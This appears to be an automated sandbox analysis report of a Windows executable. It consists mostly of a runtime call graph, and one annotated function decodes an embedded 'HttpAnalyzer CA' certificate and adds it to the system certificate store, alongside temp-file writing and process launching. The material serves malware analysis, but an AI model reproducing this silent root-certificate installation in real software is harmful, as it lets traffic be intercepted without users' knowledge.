7115->7114 7116 402b57 __freebuf 67 API calls 7115->7116 7116->7114 7119 40cabb 7117->7119 7121 402b57 __freebuf 67 API calls 7117->7121 7118->7117 7120 40cacd 7119->7120 7122 402b57 __freebuf 67 API calls 7119->7122 7123 40cadf 7120->7123 7124 402b57 __freebuf 67 API calls 7120->7124 7121->7119 7122->7120 7125 402b57 __freebuf 67 API calls 7123->7125 7123->7126 7124->7123 7125->7126 7126->7107 7128 40ca34 7127->7128 7134 40ca68 7127->7134 7129 402b57 __freebuf 67 API calls 7128->7129 7130 40ca44 7128->7130 7129->7130 7131 40ca56 7130->7131 7132 402b57 __freebuf 67 API calls 7130->7132 7133 402b57 __freebuf 67 API calls 7131->7133 7131->7134 7132->7131 7133->7134 7134->7110 7136 40c8a8 7135->7136 7137 40a5b0 7135->7137 7138 402b57 __freebuf 67 API calls 7136->7138 7137->7092 7139 40c8b0 7138->7139 7140 402b57 __freebuf 67 API calls 7139->7140 7141 40c8b8 7140->7141 7142 402b57 __freebuf 67 API calls 7141->7142 7143 40c8c0 7142->7143 7144 402b57 __freebuf 67 API calls 7143->7144 7145 40c8c8 7144->7145 7146 402b57 __freebuf 67 API calls 7145->7146 7147 40c8d0 7146->7147 7148 402b57 __freebuf 67 API calls 7147->7148 7149 40c8d8 7148->7149 7150 402b57 __freebuf 67 API calls 7149->7150 7151 40c8df 7150->7151 7152 402b57 __freebuf 67 API calls 7151->7152 7153 40c8e7 7152->7153 7154 402b57 __freebuf 67 API calls 7153->7154 7155 40c8ef 7154->7155 7156 402b57 __freebuf 67 API calls 7155->7156 7157 40c8f7 7156->7157 7158 402b57 __freebuf 67 API calls 7157->7158 7159 40c8ff 7158->7159 7160 402b57 __freebuf 67 API calls 7159->7160 7161 40c907 7160->7161 7162 402b57 __freebuf 67 API calls 7161->7162 7163 40c90f 7162->7163 7164 402b57 __freebuf 67 API calls 7163->7164 7165 40c917 7164->7165 7166 402b57 __freebuf 67 API calls 7165->7166 7167 40c91f 7166->7167 7168 402b57 __freebuf 67 API calls 7167->7168 7169 40c927 7168->7169 7170 402b57 __freebuf 67 API calls 7169->7170 7171 40c932 7170->7171 7172 402b57 __freebuf 67 API calls 7171->7172 7173 40c93a 7172->7173 7174 402b57 
__freebuf 67 API calls 7173->7174 7175 40c942 7174->7175 7176 402b57 __freebuf 67 API calls 7175->7176 7177 40c94a 7176->7177 7178 402b57 __freebuf 67 API calls 7177->7178 7179 40c952 7178->7179 7180 402b57 __freebuf 67 API calls 7179->7180 7181 40c95a 7180->7181 7182 402b57 __freebuf 67 API calls 7181->7182 7183 40c962 7182->7183 7184 402b57 __freebuf 67 API calls 7183->7184 7185 40c96a 7184->7185 7186 402b57 __freebuf 67 API calls 7185->7186 7187 40c972 7186->7187 7188 402b57 __freebuf 67 API calls 7187->7188 7189 40c97a 7188->7189 7190 402b57 __freebuf 67 API calls 7189->7190 7191 40c982 7190->7191 7192 402b57 __freebuf 67 API calls 7191->7192 7193 40c98a 7192->7193 7194 402b57 __freebuf 67 API calls 7193->7194 7195 40c992 7194->7195 7196 402b57 __freebuf 67 API calls 7195->7196 7197 40c99a 7196->7197 7198 402b57 __freebuf 67 API calls 7197->7198 7199 40c9a2 7198->7199 7200 402b57 __freebuf 67 API calls 7199->7200 7201 40c9aa 7200->7201 7202 402b57 __freebuf 67 API calls 7201->7202 7203 40c9b8 7202->7203 7204 402b57 __freebuf 67 API calls 7203->7204 7205 40c9c3 7204->7205 7206 402b57 __freebuf 67 API calls 7205->7206 7207 40c9ce 7206->7207 7208 402b57 __freebuf 67 API calls 7207->7208 7209 40c9d9 7208->7209 7210 402b57 __freebuf 67 API calls 7209->7210 7211 40c9e4 7210->7211 7212 402b57 __freebuf 67 API calls 7211->7212 7213 40c9ef 7212->7213 7214 402b57 __freebuf 67 API calls 7213->7214 7215 40c9fa 7214->7215 7216 402b57 __freebuf 67 API calls 7215->7216 7217 40ca05 7216->7217 7218 402b57 __freebuf 67 API calls 7217->7218 7219 40ca10 7218->7219 7220 402b57 __freebuf 67 API calls 7219->7220 7221 40ca1b 7220->7221 7222 402b57 __freebuf 67 API calls 7221->7222 7222->7137 7223->7066 7225 409f97 7224->7225 7227 409eee _memset 7224->7227 7229 4027ab __putwch_nolock 5 API calls 7225->7229 7234 40c85b 7227->7234 7231 40a039 7229->7231 7231->7020 7233 40c660 ___crtLCMapStringA 102 API calls 7233->7225 7235 40457e _LocaleUpdate::_LocaleUpdate 77 API calls 7234->7235 7236 
40c86c 7235->7236 7244 40c6a3 7236->7244 7239 40c660 7240 40457e _LocaleUpdate::_LocaleUpdate 77 API calls 7239->7240 7241 40c671 7240->7241 7340 40c2be 7241->7340 7245 40c6c2 GetStringTypeW 7244->7245 7246 40c6ed 7244->7246 7247 40c6e2 GetLastError 7245->7247 7248 40c6da 7245->7248 7246->7248 7249 40c7d4 7246->7249 7247->7246 7250 40c726 MultiByteToWideChar 7248->7250 7260 40c7ce 7248->7260 7291 40d73d GetLocaleInfoA 7249->7291 7251 40c753 7250->7251 7250->7260 7267 40c768 _memset __alloca_probe_16 7251->7267 7268 402c34 7251->7268 7253 4027ab __putwch_nolock 5 API calls 7254 409f52 7253->7254 7254->7239 7255 40c825 GetStringTypeA 7259 40c840 7255->7259 7255->7260 7258 40c7a1 MultiByteToWideChar 7263 40c7b7 GetStringTypeW 7258->7263 7264 40c7c8 7258->7264 7265 402b57 __freebuf 67 API calls 7259->7265 7260->7253 7263->7264 7287 40c2a3 7264->7287 7265->7260 7267->7258 7267->7260 7269 402ce1 7268->7269 7282 402c42 7268->7282 7270 4043fc __calloc_impl 4 API calls 7269->7270 7271 402ce7 7270->7271 7273 403d90 __write_nolock 66 API calls 7271->7273 7272 40642e __FF_MSGBANNER 66 API calls 7278 402c57 7272->7278 7274 402ced 7273->7274 7274->7267 7276 40628e __NMSG_WRITE 66 API calls 7276->7278 7277 402ca5 HeapAlloc 7277->7282 7278->7272 7278->7276 7278->7277 7279 405fd0 _fast_error_exit 3 API calls 7278->7279 7278->7282 7279->7278 7280 402cd8 7280->7267 7281 402ccc 7284 403d90 __write_nolock 66 API calls 7281->7284 7282->7278 7282->7280 7282->7281 7283 4043fc __calloc_impl 4 API calls 7282->7283 7285 402cca 7282->7285 7322 402be5 7282->7322 7283->7282 7284->7285 7286 403d90 __write_nolock 66 API calls 7285->7286 7286->7280 7288 40c2ab 7287->7288 7290 40c2bc 7287->7290 7289 402b57 __freebuf 67 API calls 7288->7289 7288->7290 7289->7290 7290->7260 7292 40d769 7291->7292 7293 40d76e 7291->7293 7295 4027ab __putwch_nolock 5 API calls 7292->7295 7333 40bc9c 7293->7333 7296 40c7f8 7295->7296 7296->7255 7296->7260 7297 40d784 7296->7297 7298 40d7c2 GetCPInfo 7297->7298 7302 
40d84c 7297->7302 7299 40d837 MultiByteToWideChar 7298->7299 7300 40d7d9 7298->7300 7299->7302 7306 40d7f2 _strlen 7299->7306 7300->7299 7303 40d7df GetCPInfo 7300->7303 7301 4027ab __putwch_nolock 5 API calls 7304 40c819 7301->7304 7302->7301 7303->7299 7305 40d7ec 7303->7305 7304->7255 7304->7260 7305->7299 7305->7306 7307 402c34 _malloc 67 API calls 7306->7307 7308 40d824 _memset __alloca_probe_16 7306->7308 7307->7308 7308->7302 7309 40d881 MultiByteToWideChar 7308->7309 7310 40d899 7309->7310 7314 40d8b8 7309->7314 7311 40d8a0 WideCharToMultiByte 7310->7311 7312 40d8bd 7310->7312 7311->7314 7315 40d8c8 WideCharToMultiByte 7312->7315 7316 40d8dc 7312->7316 7313 40c2a3 __freea 67 API calls 7313->7302 7314->7313 7315->7314 7315->7316 7317 4093a0 __calloc_crt 67 API calls 7316->7317 7318 40d8e4 7317->7318 7318->7314 7319 40d8ed WideCharToMultiByte 7318->7319 7319->7314 7320 40d8ff 7319->7320 7321 402b57 __freebuf 67 API calls 7320->7321 7321->7314 7323 402bf1 __ioinit 7322->7323 7324 402c22 __ioinit 7323->7324 7325 405264 __lock 67 API calls 7323->7325 7324->7282 7326 402c07 7325->7326 7327 405ab1 ___sbh_alloc_block 5 API calls 7326->7327 7328 402c12 7327->7328 7330 402c2b 7328->7330 7331 40518c _doexit LeaveCriticalSection 7330->7331 7332 402c32 7331->7332 7332->7324 7336 40cdc4 7333->7336 7337 40cddb 7336->7337 7338 40cb99 strtoxl 91 API calls 7337->7338 7339 40bca9 7338->7339 7339->7292 7341 40c2dd LCMapStringW 7340->7341 7344 40c2f8 7340->7344 7342 40c300 GetLastError 7341->7342 7341->7344 7342->7344 7343 40c4f5 7347 40d73d ___ansicp 91 API calls 7343->7347 7344->7343 7345 40c352 7344->7345 7346 40c36b MultiByteToWideChar 7345->7346 7369 40c4ec 7345->7369 7355 40c398 7346->7355 7346->7369 7348 40c51d 7347->7348 7351 40c611 LCMapStringA 7348->7351 7352 40c536 7348->7352 7348->7369 7349 4027ab __putwch_nolock 5 API calls 7350 409f72 7349->7350 7350->7233 7365 40c56d 7351->7365 7353 40d784 ___convertcp 74 API calls 7352->7353 7358 40c548 7353->7358 7354 40c3e9 
MultiByteToWideChar 7359 40c402 LCMapStringW 7354->7359 7382 40c4e3 7354->7382 7356 40c3b1 __alloca_probe_16 7355->7356 7357 402c34 _malloc 67 API calls 7355->7357 7356->7354 7356->7369 7357->7356 7361 40c552 LCMapStringA 7358->7361 7358->7369 7363 40c423 7359->7363 7359->7382 7360 402b57 __freebuf 67 API calls 7364 40c638 7360->7364 7361->7365 7371 40c574 7361->7371 7362 40c2a3 __freea 67 API calls 7362->7369 7366 40c42b 7363->7366 7370 40c454 7363->7370 7367 402b57 __freebuf 67 API calls 7364->7367 7364->7369 7365->7360 7365->7364 7368 40c43d LCMapStringW 7366->7368 7366->7382 7367->7369 7368->7382 7369->7349 7376 40c46f __alloca_probe_16 7370->7376 7378 402c34 _malloc 67 API calls 7370->7378 7373 402c34 _malloc 67 API calls 7371->7373 7377 40c585 _memset __alloca_probe_16 7371->7377 7372 40c4a3 LCMapStringW 7374 40c4bb WideCharToMultiByte 7372->7374 7375 40c4dd 7372->7375 7373->7377 7374->7375 7379 40c2a3 __freea 67 API calls 7375->7379 7376->7372 7376->7382 7377->7365 7380 40c5c3 LCMapStringA 7377->7380 7378->7376 7379->7382 7383 40c5e3 7380->7383 7384 40c5df 7380->7384 7382->7362 7385 40d784 ___convertcp 74 API calls 7383->7385 7386 40c2a3 __freea 67 API calls 7384->7386 7385->7384 7386->7365 7387->7028 7390 40a7cc 7388->7390 7391 40a7e4 7390->7391 7395 406546 TlsGetValue 7390->7395 7391->6593 7402 4043a4 7392->7402 7394 4043e9 7394->6595 7396 406559 7395->7396 7397 40657a GetModuleHandleA 7395->7397 7396->7397 7400 406563 TlsGetValue 7396->7400 7398 406572 7397->7398 7399 406589 GetProcAddress 7397->7399 7398->7390 7399->7398 7401 40656e 7400->7401 7401->7397 7401->7398 7403 4043b0 __ioinit 7402->7403 7410 405fe5 7403->7410 7409 4043d1 __ioinit 7409->7394 7411 405264 __lock 67 API calls 7410->7411 7412 4043b5 7411->7412 7413 4042c8 7412->7413 7414 4065b2 __decode_pointer 4 API calls 7413->7414 7415 4042d8 7414->7415 7416 4065b2 __decode_pointer 4 API calls 7415->7416 7417 4042e9 7416->7417 7421 404363 7417->7421 7431 409483 7417->7431 7419 404303 7422 404325 
7419->7422 7427 40434e 7419->7427 7444 4093e8 7419->7444 7420 406546 __encode_pointer 4 API calls 7420->7421 7428 4043da 7421->7428 7422->7421 7424 4093e8 __realloc_crt 73 API calls 7422->7424 7425 40433c 7422->7425 7424->7425 7425->7421 7426 406546 __encode_pointer 4 API calls 7425->7426 7426->7427 7427->7420 7493 405fee 7428->7493 7432 40948f __ioinit 7431->7432 7433 4094bc 7432->7433 7434 40949f 7432->7434 7435 4094fd HeapSize 7433->7435 7437 405264 __lock 67 API calls 7433->7437 7436 403d90 __write_nolock 67 API calls 7434->7436 7440 4094b4 __ioinit 7435->7440 7438 4094a4 7436->7438 7441 4094cc ___sbh_find_block 7437->7441 7439 402f43 __write_nolock 4 API calls 7438->7439 7439->7440 7440->7419 7449 40951d 7441->7449 7446 4093ec 7444->7446 7447 40942e 7446->7447 7448 40940f Sleep 7446->7448 7453 40bdcb 7446->7453 7447->7422 7448->7446 7452 40518c LeaveCriticalSection 7449->7452 7451 4094f8 7451->7435 7451->7440 7452->7451 7454 40bdd7 __ioinit 7453->7454 7455 40bdec 7454->7455 7456 40bdde 7454->7456 7458 40bdf3 7455->7458 7459 40bdff 7455->7459 7457 402c34 _malloc 67 API calls 7456->7457 7461 40bde6 __dosmaperr __ioinit 7457->7461 7460 402b57 __freebuf 67 API calls 7458->7460 7466 40bf71 7459->7466 7468 40be0c ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 7459->7468 7460->7461 7461->7446 7462 40bfa4 7464 4043fc __calloc_impl 4 API calls 7462->7464 7463 40bf76 HeapReAlloc 7463->7461 7463->7466 7467 40bfaa 7464->7467 7465 405264 __lock 67 API calls 7465->7468 7466->7462 7466->7463 7469 40bfc8 7466->7469 7471 4043fc __calloc_impl 4 API calls 7466->7471 7473 40bfbe 7466->7473 7470 403d90 __write_nolock 67 API calls 7467->7470 7468->7461 7468->7462 7468->7465 7477 40be97 HeapAlloc 7468->7477 7480 40beec HeapReAlloc 7468->7480 7481 405ab1 ___sbh_alloc_block 5 API calls 7468->7481 7482 40bf57 7468->7482 7483 4043fc __calloc_impl 4 API calls 7468->7483 7486 40bf3a 7468->7486 7488 405308 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 
7468->7488 7489 40bf0f 7468->7489 7469->7461 7472 403d90 __write_nolock 67 API calls 7469->7472 7470->7461 7471->7466 7474 40bfd1 GetLastError 7472->7474 7476 403d90 __write_nolock 67 API calls 7473->7476 7474->7461 7478 40bf3f 7476->7478 7477->7468 7478->7461 7479 40bf44 GetLastError 7478->7479 7479->7461 7480->7468 7481->7468 7482->7461 7484 403d90 __write_nolock 67 API calls 7482->7484 7483->7468 7485 40bf64 7484->7485 7485->7461 7485->7474 7487 403d90 __write_nolock 67 API calls 7486->7487 7487->7478 7488->7468 7492 40518c LeaveCriticalSection 7489->7492 7491 40bf16 7491->7468 7492->7491 7496 40518c LeaveCriticalSection 7493->7496 7495 4043df 7495->7409 7496->7495 7500 40b944 7497->7500 7501 40457e _LocaleUpdate::_LocaleUpdate 77 API calls 7500->7501 7502 40b955 7501->7502 7502->6600 7527 401d20 InitializeSecurityDescriptor SetSecurityDescriptorDacl CreateMutexA 7503->7527 7506 401183 ExitProcess 7507 40118b 7530 401870 CryptStringToBinaryA 7507->7530 7509 401230 7586 401d90 7509->7586 7512 401870 121 API calls 7514 40119d RegCreateKeyExA 7512->7514 7516 4011d8 7514->7516 7517 4011cd RegCloseKey 7514->7517 7515 4027ab __putwch_nolock 5 API calls 7518 40124b 7515->7518 7560 401040 7516->7560 7517->7516 7518->6521 7518->6605 7520 4011dd _memset 7521 4011f3 GetTempPathA 7520->7521 7569 4029a3 7521->7569 7525 401226 7581 401e80 7525->7581 7528 40117f 7527->7528 7529 401d6f GetLastError 7527->7529 7528->7506 7528->7507 7529->7528 7531 4018b1 7530->7531 7532 401a92 7530->7532 7531->7532 7533 402c34 _malloc 67 API calls 7531->7533 7534 4027ab __putwch_nolock 5 API calls 7532->7534 7535 4018c3 7533->7535 7536 401190 7534->7536 7535->7532 7537 4018d0 CryptStringToBinaryA CertCreateCertificateContext 7535->7537 7536->7509 7536->7512 7538 402b57 __freebuf 67 API calls 7537->7538 7539 4018f7 7538->7539 7539->7532 7540 401902 CertOpenStore 7539->7540 7541 401924 CertAddCertificateContextToStore 7540->7541 7542 401a85 CertFreeCertificateContext 7540->7542 7543 401938 
GetLastError 7541->7543 7544 401a7c CertCloseStore 7541->7544 7542->7532 7543->7544 7545 401949 CertGetCertificateContextProperty 7543->7545 7544->7542 7545->7544 7546 40196f 7545->7546 7547 402c34 _malloc 67 API calls 7546->7547 7548 401978 _memset 7547->7548 7548->7544 7549 401995 CertGetCertificateContextProperty 7548->7549 7555 4019bf _memset 7549->7555 7550 401a33 SHGetSpecialFolderPathA 7593 402adc 7550->7593 7552 402adc _sprintf 103 API calls 7552->7555 7555->7550 7555->7552 7557 401a2f 7555->7557 7556 401a6f 7558 402b57 __freebuf 67 API calls 7556->7558 7557->7550 7559 401a79 7558->7559 7559->7544 7866 4013b0 7560->7866 7562 4010c4 7563 4013b0 std::_String_base::_Xlen 75 API calls 7562->7563 7564 4010e7 7563->7564 7878 402220 7564->7878 7566 4010fe ctype 7567 4027ab __putwch_nolock 5 API calls 7566->7567 7568 401151 7567->7568 7568->7520 7570 4029b8 7569->7570 7572 4029b0 7569->7572 7571 403d90 __write_nolock 67 API calls 7570->7571 7573 4029bd 7571->7573 7572->7570 7576 4029ed 7572->7576 7574 402f43 __write_nolock 4 API calls 7573->7574 7575 40121a 7574->7575 7578 401e30 CreateFileA WriteFile 7575->7578 7576->7575 7577 403d90 __write_nolock 67 API calls 7576->7577 7577->7573 7579 401e68 7578->7579 7580 401e6d CloseHandle 7578->7580 7579->7580 7580->7525 7582 403de0 _memset 7581->7582 7583 401e9c CreateProcessA 7582->7583 7584 401ec3 CloseHandle CloseHandle 7583->7584 7585 401edc 7583->7585 7584->7585 7585->7509 7587 401dba _memset 7586->7587 7588 401dd6 GetModuleFileNameA 7587->7588 7589 402adc _sprintf 103 API calls 7588->7589 7590 401e01 WinExec 7589->7590 7591 4027ab __putwch_nolock 5 API calls 7590->7591 7592 401238 7591->7592 7592->7515 7594 402b07 7593->7594 7595 402aea 7593->7595 7594->7595 7597 402b0e 7594->7597 7596 403d90 __write_nolock 67 API calls 7595->7596 7598 402aef 7596->7598 7612 4046a1 7597->7612 7600 402f43 __write_nolock 4 API calls 7598->7600 7602 401a63 7600->7602 7604 401790 PathFileExistsA 7602->7604 7605 401862 7604->7605 7606 
4017ab CreateFileA 7604->7606 7605->7556 7606->7605 7607 4017cb GetFileTime 7606->7607 7607->7605 7608 4017e5 SystemTimeToFileTime 7607->7608 7609 40183b __aulldiv 7608->7609 7864 401710 GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 7609->7864 7611 401844 7611->7556 7611->7605 7613 40457e _LocaleUpdate::_LocaleUpdate 77 API calls 7612->7613 7614 4046fc 7613->7614 7615 404701 7614->7615 7617 4047c2 7614->7617 7670 409e06 7614->7670 7616 403d90 __write_nolock 67 API calls 7615->7616 7618 404706 7616->7618 7617->7615 7645 4047e7 __output_l __aulldvrm _strlen 7617->7645 7622 402f43 __write_nolock 4 API calls 7618->7622 7620 404741 7621 40476f 7620->7621 7623 409e06 __output_l 67 API calls 7620->7623 7621->7615 7627 409e06 __output_l 67 API calls 7621->7627 7624 404716 7622->7624 7625 40474f 7623->7625 7626 4027ab __putwch_nolock 5 API calls 7624->7626 7625->7621 7629 409e06 __output_l 67 API calls 7625->7629 7628 402b34 7626->7628 7630 404794 7627->7630 7628->7602 7649 40441e 7628->7649 7631 40475d 7629->7631 7630->7617 7634 409e06 __output_l 67 API calls 7630->7634 7633 409e06 __output_l 67 API calls 7631->7633 7633->7621 7635 4047a2 7634->7635 7635->7617 7637 409e06 __output_l 67 API calls 7635->7637 7636 404600 101 API calls _write_string 7636->7645 7639 4047b0 7637->7639 7638 404fd7 7642 403d90 __write_nolock 67 API calls 7638->7642 7641 409e06 __output_l 67 API calls 7639->7641 7640 402b57 __freebuf 67 API calls 7640->7645 7641->7617 7642->7618 7643 40a946 79 API calls _wctomb_s 7643->7645 7644 409360 __malloc_crt 67 API calls 7644->7645 7645->7624 7645->7636 7645->7638 7645->7640 7645->7643 7645->7644 7646 404657 101 API calls _write_string 7645->7646 7647 4065b2 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 7645->7647 7648 404633 101 API calls _write_multi_char 7645->7648 7677 40a961 7645->7677 7646->7645 7647->7645 7648->7645 7650 409e06 __output_l 67 API calls 7649->7650 7651 40442c 7650->7651 7652 404437 7651->7652 7653 
40444e 7651->7653 7655 403d90 __write_nolock 67 API calls 7652->7655 7654 404452 7653->7654 7664 40445f __stbuf 7653->7664 7656 403d90 __write_nolock 67 API calls 7654->7656 7657 40443c 7655->7657 7656->7657 7657->7602 7658 40454d 7660 409c88 __locking 101 API calls 7658->7660 7659 4044cd 7661 4044e4 7659->7661 7663 404501 7659->7663 7660->7657 7693 409c88 7661->7693 7663->7657 7718 4095a9 7663->7718 7664->7657 7666 4044b4 7664->7666 7669 4044bf 7664->7669 7680 409da8 7664->7680 7666->7669 7690 409d64 7666->7690 7669->7658 7669->7659 7671 409e11 7670->7671 7672 409e2e 7670->7672 7673 403d90 __write_nolock 67 API calls 7671->7673 7672->7620 7674 409e16 7673->7674 7675 402f43 __write_nolock 4 API calls 7674->7675 7676 409e26 7675->7676 7676->7620 7678 40457e _LocaleUpdate::_LocaleUpdate 77 API calls 7677->7678 7679 40a972 7678->7679 7679->7645 7681 409db1 7680->7681 7682 409dbf 7680->7682 7683 403d90 __write_nolock 67 API calls 7681->7683 7685 409dea 7682->7685 7686 403d90 __write_nolock 67 API calls 7682->7686 7684 409db6 7683->7684 7684->7666 7685->7666 7687 409dd3 7686->7687 7688 402f43 __write_nolock 4 API calls 7687->7688 7689 409de3 7688->7689 7689->7666 7691 409360 __malloc_crt 67 API calls 7690->7691 7692 409d74 7691->7692 7692->7669 7694 409c94 __ioinit 7693->7694 7695 409cb7 7694->7695 7696 409c9c 7694->7696 7698 409cc5 7695->7698 7702 409d06 7695->7702 7750 403da3 7696->7750 7699 403da3 __write_nolock 67 API calls 7698->7699 7701 409cca 7699->7701 7704 403d90 __write_nolock 67 API calls 7701->7704 7753 40c11f 7702->7753 7703 403d90 __write_nolock 67 API calls 7706 409ca9 __ioinit 7703->7706 7707 409cd1 7704->7707 7706->7657 7709 402f43 __write_nolock 4 API calls 7707->7709 7708 409d0c 7710 409d19 7708->7710 7711 409d2f 7708->7711 7709->7706 7763 4096c2 7710->7763 7713 403d90 __write_nolock 67 API calls 7711->7713 7714 409d34 7713->7714 7716 403da3 __write_nolock 67 API calls 7714->7716 7715 409d27 7820 409d5a 7715->7820 7716->7715 7719 4095b5 __ioinit 

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(-----BEGIN CERTIFICATE-----MIIC/DCCAeSgAwIBAgIRAM7/2B7/QDUVyz9XivEGNvAwDQYJKoZIhvcNAQEFBQAwJzELMAkGA1UEBhMCRU4xGDAWBgNVBAMTD0h0dHBBbmFseXplciBDQTAeFw0xNDA1MjAwMjUzMThaFw0zNDA1MTUwMjUzMThaMCcxCzAJBgNVBAYTAkVOMRgwFgYDVQQDEw9IdHRwQW5hbHl6ZXIgQ0EwggEiMA0GCSqGS,00000000,00000000,00000000,?,00000000,00000000), ref: 004018A7
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 004018BE
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: __FF_MSGBANNER.LIBCMT ref: 00402C57
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: __NMSG_WRITE.LIBCMT ref: 00402C5E
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: HeapAlloc.KERNEL32(00000000,?,74E96E60,?,?,00000000,004018C3,?), ref: 00402CAC
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(-----BEGIN CERTIFICATE-----MIIC/DCCAeSgAwIBAgIRAM7/2B7/QDUVyz9XivEGNvAwDQYJKoZIhvcNAQEFBQAwJzELMAkGA1UEBhMCRU4xGDAWBgNVBAMTD0h0dHBBbmFseXplciBDQTAeFw0xNDA1MjAwMjUzMThaFw0zNDA1MTUwMjUzMThaMCcxCzAJBgNVBAYTAkVOMRgwFgYDVQQDEw9IdHRwQW5hbHl6ZXIgQ0EwggEiMA0GCSqGS,00000000,00000000,00000000,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                                              • CertCreateCertificateContext.CRYPT32(00000001,00000000,?), ref: 004018E9
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: __lock.LIBCMT ref: 00402B75
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: ___sbh_find_block.LIBCMT ref: 00402B80
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: ___sbh_free_block.LIBCMT ref: 00402B8F
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: HeapFree.KERNEL32(00000000,?,0044A918,0000000C,00405245,00000000,0044A9E0,0000000C,0040527D,?,?,?,0040BD2E,00000004,0044AD90,0000000C), ref: 00402BBF
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: GetLastError.KERNEL32(?,00403D95,00402CED,00000000,004018C3,?), ref: 00402BD0
                                                                                                                                                                                                                                                              • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00014000,0044A3E8), ref: 00401910
                                                                                                                                                                                                                                                              • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 0040192A
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401938
                                                                                                                                                                                                                                                              • CertGetCertificateContextProperty.CRYPT32 ref: 00401961
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00401973
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401990
                                                                                                                                                                                                                                                              • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,?), ref: 004019A1
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004019BA
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004019D9
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004019F2
                                                                                                                                                                                                                                                              • _sprintf.LIBCMT ref: 00401A1B
                                                                                                                                                                                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,?,00000000,00000103,?,00000000,00000103,?,00000000,00000103), ref: 00401A3E
                                                                                                                                                                                                                                                              • _sprintf.LIBCMT ref: 00401A5E
                                                                                                                                                                                                                                                              • CertCloseStore.CRYPT32(00000000,00000001), ref: 00401A7F
                                                                                                                                                                                                                                                              • CertFreeCertificateContext.CRYPT32(00000000), ref: 00401A86
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • %s\Microsoft\SystemCertificates\My\Certificates\%s, xrefs: 00401A58
                                                                                                                                                                                                                                                              • -----BEGIN CERTIFICATE-----MIIC/DCCAeSgAwIBAgIRAM7/2B7/QDUVyz9XivEGNvAwDQYJKoZIhvcNAQEFBQAwJzELMAkGA1UEBhMCRU4xGDAWBgNVBAMTD0h0dHBBbmFseXplciBDQTAeFw0xNDA1MjAwMjUzMThaFw0zNDA1MTUwMjUzMThaMCcxCzAJBgNVBAYTAkVOMRgwFgYDVQQDEw9IdHRwQW5hbHl6ZXIgQ0EwggEiMA0GCSqGS, xrefs: 0040189A, 004018DA
                                                                                                                                                                                                                                                              • %02X, xrefs: 00401A15
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Cert$CertificateContext$_memset$Store$BinaryCryptErrorFreeHeapLastPropertyString_malloc_sprintf$AllocCloseCreateFolderOpenPathSpecial___sbh_find_block___sbh_free_block__lock
                                                                                                                                                                                                                                                              • String ID: %02X$%s\Microsoft\SystemCertificates\My\Certificates\%s$-----BEGIN CERTIFICATE-----MIIC/DCCAeSgAwIBAgIRAM7/2B7/QDUVyz9XivEGNvAwDQYJKoZIhvcNAQEFBQAwJzELMAkGA1UEBhMCRU4xGDAWBgNVBAMTD0h0dHBBbmFseXplciBDQTAeFw0xNDA1MjAwMjUzMThaFw0zNDA1MTUwMjUzMThaMCcxCzAJBgNVBAYTAkVOMRgwFgYDVQQDEw9IdHRwQW5hbHl6ZXIgQ0EwggEiMA0GCSqGS
                                                                                                                                                                                                                                                              • API String ID: 3463177663-234524284
                                                                                                                                                                                                                                                              • Opcode ID: 2629ce6460a876b2837b9365e1982b550fa9b1502f47bf0f5508d79af2f3a13e
                                                                                                                                                                                                                                                              • Instruction ID: 6f6a5e1feda1b130aac6b651d9f558dbab91ffb13dc69dfec88f4b3be10ee0dd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2629ce6460a876b2837b9365e1982b550fa9b1502f47bf0f5508d79af2f3a13e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51510A716443057BE220EF51DC46F9BBBDCEF84744F00082EF549B61D1E6B9AA44CA6B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

